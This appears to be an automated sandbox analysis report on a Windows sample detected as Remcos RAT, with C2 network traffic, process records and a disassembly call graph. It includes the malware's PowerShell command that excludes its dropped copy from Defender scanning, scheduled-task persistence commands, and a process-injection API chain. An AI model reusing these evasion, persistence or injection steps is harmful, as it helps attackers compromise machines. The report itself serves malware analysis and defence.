                                              Dec 17, 2024 20:42:04.576983929 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.577234030 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.580075026 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.699975014 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.517621994 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.517761946 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.517792940 CET500772560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.637629986 CET256050077107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.687669992 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.808248043 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:06.808346033 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.811984062 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:06.931510925 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.786358118 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.786444902 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:08.786530018 CET500782560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:08.906239986 CET256050078107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:08.951988935 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.071787119 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:09.071892023 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.075342894 CET500792560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:09.196891069 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:11.000874996 CET256050079107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:11.000967026 CET500792560192.168.2.6107.173.4.16

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 17, 2024 20:38:10.596251011 CET1.1.1.1192.168.2.60x6fb9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 17, 2024 20:38:10.596251011 CET1.1.1.1192.168.2.60x6fb9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                              Dec 17, 2024 20:38:22.358520031 CET1.1.1.1192.168.2.60x9f3aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Dec 17, 2024 20:38:22.358520031 CET1.1.1.1192.168.2.60x9f3aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              Dec 17, 2024 20:38:24.846611977 CET1.1.1.1192.168.2.60x547fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Dec 17, 2024 20:38:24.846611977 CET1.1.1.1192.168.2.60x547fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:14:38:02
                                              Start date:17/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x940000
                                              File size:1'075'712 bytes
                                              MD5 hash:065A6053492ECC989755413D4B9CFFEA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
                                              Imagebase:0x390000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
                                              Imagebase:0xd50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:14:38:05
                                              Start date:17/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0x6b0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:14:38:07
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff717f30000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:14:38:08
                                              Start date:17/12/2024
                                              Path:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
                                              Imagebase:0x9e0000
                                              File size:1'075'712 bytes
                                              MD5 hash:065A6053492ECC989755413D4B9CFFEA
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 39%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"
                                              Imagebase:0xd50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:14:38:09
                                              Start date:17/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              Imagebase:0xfb0000
                                              File size:262'432 bytes
                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:96.1%
                                                Signature Coverage:10.3%
                                                Total number of Nodes:310
                                                Total number of Limit Nodes:13
                                                execution_graph 60243 140ac70 60244 140ac7f 60243->60244 60246 140ad68 60243->60246 60247 140ad9c 60246->60247 60248 140ad79 60246->60248 60247->60244 60248->60247 60249 140afa0 GetModuleHandleW 60248->60249 60250 140afcd 60249->60250 60250->60244 60384 140d000 60385 140d046 60384->60385 60389 140d5d8 60385->60389 60393 140d5e8 60385->60393 60386 140d133 60390 140d5e8 60389->60390 60396 140d23c 60390->60396 60394 140d23c DuplicateHandle 60393->60394 60395 140d616 60394->60395 60395->60386 60397 140d650 DuplicateHandle 60396->60397 60398 140d616 60397->60398 60398->60386 60251 2d51b60 60252 2d51b86 60251->60252 60255 2d51ceb 60251->60255 60252->60255 60256 2d51de0 PostMessageW 60252->60256 60258 2d51dd8 PostMessageW 60252->60258 60257 2d51e4c 60256->60257 60257->60252 60259 2d51e4c 60258->60259 60259->60252 60047 2e86be0 60048 2e86c0b 60047->60048 60078 2e86604 60048->60078 60050 2e86c44 60083 2e86614 60050->60083 60053 2e86614 2 API calls 60054 2e86c80 60053->60054 60055 2e86604 2 API calls 60054->60055 60056 2e86c9e 60055->60056 60057 2e86614 2 API calls 60056->60057 60058 2e86cda 60057->60058 60059 2e86604 2 API calls 60058->60059 60060 2e86cf8 60059->60060 60061 2e86604 2 API calls 60060->60061 60062 2e86d16 60061->60062 60063 2e86614 2 API calls 60062->60063 60064 2e86d34 60063->60064 60065 2e86604 2 API calls 60064->60065 60066 2e86d52 60065->60066 60067 2e86614 2 API calls 60066->60067 60068 2e86d70 60067->60068 60069 2e86604 2 API calls 60068->60069 60070 2e86d8e 60069->60070 60071 2e86604 2 API calls 60070->60071 60072 2e86dac 60071->60072 60073 2e86604 2 API calls 60072->60073 60074 2e86dca 60073->60074 60075 2e87035 60074->60075 60087 1405ca4 60074->60087 60092 14082cb 60074->60092 60079 2e8660f 60078->60079 60081 1405ca4 2 API calls 60079->60081 60082 14082cb 2 API calls 60079->60082 60080 2e88683 60080->60050 60081->60080 60082->60080 60084 2e8661f 60083->60084 60097 2e86ba4 60084->60097 60086 2e86c62 60086->60053 60089 1405caf 60087->60089 60088 14085c9 60088->60075 60089->60088 60102 140cd38 60089->60102 60107 140cd29 60089->60107 60093 1408303 60092->60093 60094 14085c9 60093->60094 60095 140cd38 2 API calls 60093->60095 60096 140cd29 2 API calls 60093->60096 60094->60075 60095->60094 60096->60094 60098 2e86baf 60097->60098 60099 2e89522 60098->60099 60100 1405ca4 2 API calls 60098->60100 60101 14082cb 2 API calls 60098->60101 60099->60086 60100->60099 60101->60099 60103 140cd59 60102->60103 60104 140cd7d 60103->60104 60113 140cee7 60103->60113 60117 140cee8 60103->60117 60104->60088 60108 140ccdf 60107->60108 60109 140cd32 60107->60109 60108->60088 60110 140cd7d 60109->60110 60111 140cee7 2 API calls 60109->60111 60112 140cee8 2 API calls 60109->60112 60110->60088 60111->60110 60112->60110 60114 140cef5 60113->60114 60116 140cf2f 60114->60116 60121 140baa0 60114->60121 60116->60104 60119 140cef5 60117->60119 60118 140cf2f 60118->60104 60119->60118 60120 140baa0 2 API calls 60119->60120 60120->60118 60123 140baa5 60121->60123 60122 140dc48 60123->60122 60125 140d29c 60123->60125 60126 140d2a7 60125->60126 60127 1405ca4 2 API calls 60126->60127 60128 140dcb7 60127->60128 60132 140fa30 60128->60132 60138 140fa48 60128->60138 60129 140dcf1 60129->60122 60134 140fb79 60132->60134 60135 140fa79 60132->60135 60133 140fa85 60133->60129 60134->60129 60135->60133 60144 2e809c0 60135->60144 60149 2e809b0 60135->60149 60140 140fb79 60138->60140 60141 140fa79 60138->60141 60139 140fa85 60139->60129 60140->60129 60141->60139 60142 2e809c0 2 API calls 60141->60142 60143 2e809b0 2 API calls 60141->60143 60142->60140 60143->60140 60146 2e809eb 60144->60146 60145 2e80a9a 60145->60145 60146->60145 60154 2e818a0 60146->60154 60158 2e81850 60146->60158 60150 2e809c0 60149->60150 60151 2e80a9a 60150->60151 60152 2e818a0 2 API calls 60150->60152 60153 2e81850 2 API calls 60150->60153 60152->60151 60153->60151 60164 2e818f0 60154->60164 60168 2e818e4 60154->60168 60159 2e81853 60158->60159 60161 2e81771 60158->60161 60159->60161 60162 2e818f0 CreateWindowExW 60159->60162 60163 2e818e4 CreateWindowExW 60159->60163 60160 2e818d5 60160->60145 60161->60145 60162->60160 60163->60160 60165 2e818f2 CreateWindowExW 60164->60165 60167 2e81a14 60165->60167 60169 2e818f0 CreateWindowExW 60168->60169 60171 2e81a14 60169->60171 60201 2e84040 60202 2e84089 60201->60202 60203 2e84082 60201->60203 60203->60202 60204 2e840da CallWindowProcW 60203->60204 60204->60202 60205 1404668 60206 1404672 60205->60206 60210 1404759 60205->60210 60215 1403e28 60206->60215 60208 140468d 60211 140477d 60210->60211 60219 1404858 60211->60219 60223 1404868 60211->60223 60216 1403e33 60215->60216 60231 1405c24 60216->60231 60218 1406f8e 60218->60208 60221 1404868 60219->60221 60220 140496c 60220->60220 60221->60220 60227 14044b0 60221->60227 60225 140488f 60223->60225 60224 140496c 60224->60224 60225->60224 60226 14044b0 CreateActCtxA 60225->60226 60226->60224 60228 14058f8 CreateActCtxA 60227->60228 60230 14059bb 60228->60230 60232 1405c2f 60231->60232 60235 1405c44 60232->60235 60234 14070b5 60234->60218 60236 1405c4f 60235->60236 60239 1405c74 60236->60239 60238 140719a 60238->60234 60240 1405c7f 60239->60240 60241 1405ca4 2 API calls 60240->60241 60242 140728d 60241->60242 60242->60238 60260 2d508e8 60261 2d50902 60260->60261 60275 2d50926 60261->60275 60278 2d50ff4 60261->60278 60281 2d50c08 60261->60281 60285 2d51148 60261->60285 60289 2d5136c 60261->60289 60293 2d514cd 60261->60293 60297 2d50dc6 60261->60297 60301 2d50dc4 60261->60301 60305 2d510c4 60261->60305 60308 2d512fe 60261->60308 60312 2d51112 60261->60312 60315 2d51530 60261->60315 60319 2d50cd1 60261->60319 60323 2d51416 60261->60323 60327 2d50f56 60261->60327 60331 2d51097 60261->60331 60338 74bebe8 60278->60338 60282 2d50c4b 60281->60282 60282->60275 60342 74bee70 60282->60342 60286 2d510c3 60285->60286 60287 2d51037 60286->60287 60288 74bebe8 WriteProcessMemory 60286->60288 60287->60275 60288->60287 60290 2d517d7 60289->60290 60346 74becd8 60290->60346 60294 2d51489 60293->60294 60294->60293 60295 2d511a9 60294->60295 60296 74bebe8 WriteProcessMemory 60294->60296 60296->60294 60298 2d50cda 60297->60298 60298->60275 60300 74bee70 CreateProcessA 60298->60300 60299 2d50e3b 60299->60275 60299->60299 60300->60299 60302 2d50cee 60301->60302 60302->60275 60304 74bee70 CreateProcessA 60302->60304 60303 2d50e3b 60303->60275 60303->60303 60304->60303 60307 74bebe8 WriteProcessMemory 60305->60307 60306 2d51037 60306->60275 60307->60306 60309 2d515d0 60308->60309 60350 74beb28 60309->60350 60354 74be618 60312->60354 60316 2d50f83 60315->60316 60358 74be130 60316->60358 60320 2d50cda 60319->60320 60322 74bee70 CreateProcessA 60320->60322 60321 2d50e3b 60321->60275 60321->60321 60322->60321 60324 2d51423 60323->60324 60325 2d511a9 60324->60325 60326 74bebe8 WriteProcessMemory 60324->60326 60326->60324 60328 2d50f82 60327->60328 60330 74be130 ResumeThread 60328->60330 60329 2d50f97 60329->60275 60330->60329 60332 2d510a4 60331->60332 60333 2d50f82 60331->60333 60334 2d50f97 60332->60334 60362 2d51a90 60332->60362 60366 2d51aa0 60332->60366 60333->60334 60337 74be130 ResumeThread 60333->60337 60334->60275 60337->60334 60339 74bec30 WriteProcessMemory 60338->60339 60341 2d50e60 60339->60341 60343 74beef9 60342->60343 60343->60343 60344 74bf05e CreateProcessA 60343->60344 60345 74bf0bb 60344->60345 60347 74bed23 ReadProcessMemory 60346->60347 60349 2d517f9 60347->60349 60351 74beb68 VirtualAllocEx 60350->60351 60353 2d50e60 60351->60353 60355 74be65d Wow64SetThreadContext 60354->60355 60357 2d5112c 60355->60357 60359 74be170 ResumeThread 60358->60359 60361 2d50f97 60359->60361 60361->60275 60363 2d51ab5 60362->60363 60365 74be618 Wow64SetThreadContext 60363->60365 60364 2d51acb 60364->60333 60365->60364 60367 2d51ab5 60366->60367 60369 74be618 Wow64SetThreadContext 60367->60369 60368 2d51acb 60368->60333 60369->60368 60172 72640b8 60174 72640f7 60172->60174 60173 72640fb 60174->60173 60175 7264366 60174->60175 60176 726437b 60174->60176 60181 72620a4 60175->60181 60177 72620a4 3 API calls 60176->60177 60179 726438a 60177->60179 60183 72620af 60181->60183 60182 7264371 60183->60182 60186 72650d0 60183->60186 60192 72650bf 60183->60192 60189 72650ea 60186->60189 60198 72620cc 60186->60198 60188 72650f7 60188->60182 60189->60188 60190 726510f CreateIconFromResourceEx 60189->60190 60191 726519e 60190->60191 60191->60182 60193 72620cc CreateIconFromResourceEx 60192->60193 60194 72650ea 60193->60194 60195 72650f7 60194->60195 60196 726510f CreateIconFromResourceEx 60194->60196 60195->60182 60197 726519e 60196->60197 60197->60182 60199 7265120 CreateIconFromResourceEx 60198->60199 60200 726519e 60199->60200 60200->60189 60370 54603f8 60371 5460417 60370->60371 60374 5460438 60370->60374 60379 5460429 60370->60379 60375 5460466 60374->60375 60377 1405ca4 2 API calls 60375->60377 60378 14082cb 2 API calls 60375->60378 60376 546049c 60376->60371 60377->60376 60378->60376 60380 5460466 60379->60380 60382 1405ca4 2 API calls 60380->60382 60383 14082cb 2 API calls 60380->60383 60381 546049c 60381->60371 60382->60381 60383->60381 60399 7269af8 60400 7269b0a 60399->60400 60401 7269b1b 60400->60401 60409 74b0e0b 60400->60409 60413 74b1c82 60400->60413 60417 74b046c 60400->60417 60421 74b0b4d 60400->60421 60425 74b0aee 60400->60425 60429 74b09fe 60400->60429 60433 74b1179 60400->60433 60438 74b2778 60409->60438 60441 74b2770 60409->60441 60410 74b0e1f 60415 74b2778 VirtualProtect 60413->60415 60416 74b2770 VirtualProtect 60413->60416 60414 74b1c96 60415->60414 60416->60414 60419 74b2778 VirtualProtect 60417->60419 60420 74b2770 VirtualProtect 60417->60420 60418 74b049d 60419->60418 60420->60418 60423 74b2778 VirtualProtect 60421->60423 60424 74b2770 VirtualProtect 60421->60424 60422 74b0b5e 60423->60422 60424->60422 60427 74b2778 VirtualProtect 60425->60427 60428 74b2770 VirtualProtect 60425->60428 60426 74b0b05 60427->60426 60428->60426 60431 74b2778 VirtualProtect 60429->60431 60432 74b2770 VirtualProtect 60429->60432 60430 74b0a15 60431->60430 60432->60430 60434 74b117c 60433->60434 60435 74b11e1 60434->60435 60436 74b2778 VirtualProtect 60434->60436 60437 74b2770 VirtualProtect 60434->60437 60436->60434 60437->60434 60439 74b27c0 VirtualProtect 60438->60439 60440 74b27fa 60439->60440 60440->60410 60442 74b27c0 VirtualProtect 60441->60442 60443 74b27fa 60442->60443 60443->60410 60444 7263fd8 60445 7264026 DrawTextExW 60444->60445 60447 726407e 60445->60447

                                                Executed Functions

                                                Function 02E86BE0 Relevance: 37.9, Strings: 29, Instructions: 1643COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2e86be0-2e86fa1 call 2e86604 call 2e86614 * 2 call 2e86604 call 2e86a64 call 2e86614 call 2e86604 * 2 call 2e86614 call 2e86604 call 2e86614 call 2e86604 * 3 call 2e86a64 * 3 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 398 2e86fa7 call 5466887 0->398 399 2e86fa7 call 5466888 0->399 89 2e86fad-2e8700c 406 2e8700f call 54671f7 89->406 407 2e8700f call 54671f8 89->407 96 2e87015-2e8702f 99 2e8865a-2e88679 96->99 100 2e87035-2e883df call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86ab4 call 2e86ac4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86ab4 call 2e86ac4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86ab4 call 2e86ac4 call 2e86a74 call 2e86a84 call 2e86a94 call 2e86aa4 call 2e86ab4 call 2e86ac4 call 2e86ad4 call 2e86ae4 call 2e86af4 call 2e86b04 96->100 104 2e88683-2e88743 call 2e86b44 call 2e86b54 99->104 392 2e8867e call 1405ca4 99->392 393 2e8867e call 14082cb 99->393 394 2e883e2 call 546da00 100->394 395 2e883e2 call 546da1f 100->395 396 2e883e2 call 546da08 100->396 397 2e883e2 call 546da28 100->397 326 2e883e5-2e88424 call 2e86b04 * 3 400 2e88427 call 546da00 326->400 401 2e88427 call 546da1f 326->401 402 2e88427 call 546da08 326->402 403 2e88427 call 546da28 326->403 335 2e8842a-2e8847b call 2e86b04 * 3 388 2e8847e call 546da00 335->388 389 2e8847e call 546da1f 335->389 390 2e8847e call 546da08 335->390 391 2e8847e call 546da28 335->391 344 2e88481-2e88644 call 2e86b04 * 10 call 2e86b14 call 2e86b24 call 2e86a84 404 2e88646 call 546ea8f 344->404 405 2e88646 call 546ea98 344->405 385 2e8864b-2e8864d call 2e86b34 387 2e88652-2e88659 385->387 388->344 389->344 390->344 391->344 392->104 393->104 394->326 395->326 396->326 397->326 398->89 399->89 400->335 401->335 402->335 403->335 404->385 405->385 406->96 407->96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2167842860.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e80000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $ $ $ $ $ $ $&$&$&$&$&$4$4$6$;$;$;$U$U$p$p$p$p$p$q$q$u
                                                • API String ID: 0-587912492
                                                • Opcode ID: b1e37affebbf2c9ef63482d71d44b9ddcf71e689c7de763094d3731e16b901bd
                                                • Instruction ID: 56f3d69d7e150ed57c514824d1b7c5ee3d536eb6d7547f8e1d403401d00fa5ef
                                                • Opcode Fuzzy Hash: b1e37affebbf2c9ef63482d71d44b9ddcf71e689c7de763094d3731e16b901bd
                                                • Instruction Fuzzy Hash: F4035830A50719CFCB15EF34C894699B7B2FF89300F1196E9E9496B361EB71AA85CF40
                                                Function 0726C7CE Relevance: 4.0, Strings: 3, Instructions: 287COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 408 726c7ce-726c80d 410 726c814-726c852 call 726cd90 408->410 411 726c80f 408->411 413 726c858 410->413 411->410 414 726c85f-726c87b 413->414 415 726c884-726c885 414->415 416 726c87d 414->416 417 726cbdb-726cbe2 415->417 416->413 416->415 416->417 418 726ca63-726ca78 416->418 419 726c900-726c918 416->419 420 726caad-726cab1 416->420 421 726c96d-726c98b 416->421 422 726c88a-726c88e 416->422 423 726c8cb-726c8d4 416->423 424 726cb6b-726cb71 416->424 425 726c9f6-726ca16 416->425 426 726c956-726c968 416->426 427 726ca37-726ca4c 416->427 428 726c8b7-726c8c9 416->428 429 726cb95-726cba1 416->429 430 726c990-726c99c 416->430 431 726ca51-726ca5e 416->431 432 726c9df-726c9f1 416->432 433 726cbbf-726cbd6 416->433 434 726ca7d-726ca81 416->434 435 726cadd-726cae9 416->435 436 726c9ba-726c9da 416->436 437 726ca1b-726ca32 416->437 418->414 446 726c91f 419->446 447 726c91a 419->447 452 726cac4-726cacb 420->452 453 726cab3-726cac2 420->453 421->414 442 726c890-726c89f 422->442 443 726c8a1-726c8a8 422->443 444 726c8d6-726c8e5 423->444 445 726c8e7-726c8ee 423->445 460 726cb79-726cb90 424->460 425->414 426->414 427->414 428->414 448 726cba3 429->448 449 726cba8-726cbba 429->449 440 726c9a3-726c9b5 430->440 441 726c99e 430->441 431->414 432->414 433->414 450 726ca94-726ca9b 434->450 451 726ca83-726ca92 434->451 438 726caf0-726cb06 435->438 439 726caeb 435->439 436->414 437->414 466 726cb0d-726cb23 438->466 467 726cb08 438->467 439->438 440->414 441->440 457 726c8af-726c8b5 442->457 443->457 459 726c8f5-726c8fb 